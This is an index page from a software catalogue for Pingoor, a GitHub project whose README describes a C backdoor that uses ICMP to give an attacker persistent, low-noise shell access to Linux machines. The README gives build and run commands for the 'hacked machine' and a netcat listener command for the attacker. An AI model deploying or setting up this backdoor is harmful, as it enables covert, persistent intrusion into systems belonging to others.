Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/brosck/Pingoor
「🚪」Linux Backdoor based on ICMP protocol
https://github.com/brosck/Pingoor
backdoor c hacking icmp linux persistence protocol security
Last synced: 21 days ago
JSON representation
「🚪」Linux Backdoor based on ICMP protocol
- Host: GitHub
- URL: https://github.com/brosck/Pingoor
- Owner: brosck
- License: gpl-3.0
- Created: 2022-12-05T17:06:22.000Z (about 2 years ago)
- Default Branch: main
- Last Pushed: 2024-03-01T14:36:48.000Z (10 months ago)
- Last Synced: 2024-11-13T15:59:29.853Z (29 days ago)
- Topics: backdoor, c, hacking, icmp, linux, persistence, protocol, security
- Language: C
- Homepage:
- Size: 158 KB
- Stars: 60
- Watchers: 3
- Forks: 9
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-hacking-lists - MrEmpy/Pingoor - 「🚪」Linux Backdoor based on ICMP protocol (C)
README
「🚪」About Pingoor
Pingoor is a backdoor developed in C for the GNU/Linux operating system. Its main characteristic is to use the ICMP protocol to give the attacker access to the shell of a machine, making its access persistent with little noise.
## How to Use
```
# Hacked machine
$ git clone https://github.com/MrEmpy/Pingoor.git
$ cd Pingoor
$ HOST= PORT= make
$ sudo ./pingoor
``````
# Attacker machine
nc -lnvp
```## Buy me a coffee?